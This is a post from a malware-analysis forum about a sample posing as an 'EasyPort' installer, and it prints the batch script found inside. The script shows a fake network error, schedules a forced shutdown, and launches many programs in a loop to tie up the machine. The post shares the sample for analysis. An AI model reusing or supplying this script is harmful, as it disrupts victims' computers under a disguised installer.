A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #32409  by EP_X0FF
 Wed Jan 09, 2019 10:27 am
markusg wrote: Sat Jan 28, 2017 9:41 pm SHA256:
https://virustotal.com/de/file/95c26288 ... 485639002/
RAR SFX with the following bat file inside. Joke.
Code: Select all
@echo off
title EasyPort v5.4.0.0
color 0a
echo: Press Enter to continue
echo: loading
echo: Erro 404 verifique o cabo da internet
shutdown -s -t 60 -c "isso so foi um aviso"
@echo off
rem Denial Of Service Local
start notepad.exe
start write.exe
start sol.exe
start cmd.exe
start powerpnt.exe
start excel.exe
start winword.exe
start msacess.exe
goto Fucker: